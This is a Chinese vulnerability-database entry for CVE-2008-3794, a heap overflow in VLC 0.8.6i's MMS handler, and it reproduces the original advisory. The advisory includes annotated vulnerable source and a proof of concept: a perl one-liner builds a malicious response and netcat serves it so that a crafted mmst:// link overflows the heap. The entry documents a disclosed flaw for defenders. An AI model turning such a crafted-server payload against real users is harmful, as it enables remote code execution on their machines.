VLC MediaPlayer MMS协议处理 整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115957 漏洞类型 数字错误
发布时间 2008-08-23 更新时间 2009-06-18
CVE编号 CVE-2008-3794 CNNVD-ID CNNVD-200808-315
漏洞平台 Multiple CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6293
https://www.securityfocus.com/bid/30806
https://cxsecurity.com/issue/WLB-2008080182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-315
|漏洞详情
VLCMediaPlayer(VideoLan)是一款免费的媒体播放器。VLCMediaPlayer(v0.8.6i)的modules/access/mms/mmstu.c文件中mms_ReceiveCommand函数存在整数符号错误。攻击者可通过构造特殊的mmst链接导致堆溢出,从而执行任意代码。
|漏洞EXP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name       	: VLC 0.8.6i MMS Protocol Handling
Class        	: Heap Overflow
Published   	: 2008-08-24
Credit		: g_ (g_ # orange-bat # com)

- - Details -

This can be exploited from remote. User have to open mmst://
link poiting to server controlled by the attacker.

vlc\modules\access\mms\mmstu.c :

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )	
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );	//BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
                              uint8_t *p_data,
                              int i_data,
                              int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                   i_length - i_data  );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot 

open this url in VLC:

mmst://127.0.0.1/

boom! headshot :)

- - PGP -

All advisories from Orange Bat are signed. You can find our public
key here: http://www.orange-bat.com/g_.asc

- - Disclaimer -

This document and all the information it contains is provided "as is",
without any warranty. Orange Bat is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.

(c) 2008 www.orange-bat.com 


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70

iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2
AuIAnRjabi6RiPT6G/66kxseVG+K0rkj
=/CN5
-----END PGP SIGNATURE-----

# milw0rm.com [2008-08-23]
|受影响的产品
VideoLAN VLC media player 0.8.6 i Pardus Linux 2008 0 Gentoo Linux Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4
|参考资料

来源:XF
名称:vlcmediaplayer-memmove-bo(44659)
链接:http://xforce.iss.net/xforce/xfdb/44659
来源:SECTRACK
名称:1020759
链接:http://www.securitytracker.com/id?1020759
来源:BID
名称:30806
链接:http://www.securityfocus.com/bid/30806
来源:MISC
链接:http://www.orange-bat.com/adv/2008/adv.08.24.txt
来源:MLIST
名称:[oss-security]20080824Re:CVEidrequest:vlc
链接:http://www.openwall.com/lists/oss-security/2008/08/24/3
来源:MILW0RM
名称:6293
链接:http://www.milw0rm.com/exploits/6293
来源:SREASON
名称:4190
链接:http://securityreason.com/securityalert/4190
来源:GENTOO
名称:GLSA-200809-06
链接:http://security.gentoo.org/glsa/glsa-200809-06.xml
来源:MLIST
名称:[vlc-devel]20080824commit:MMSintegershandlingfixes,includingbufferoverflow(RémiDenis-Courmont)
链接:http://mailman.videolan.org/pipermail/vlc-devel/2008-August/048488.html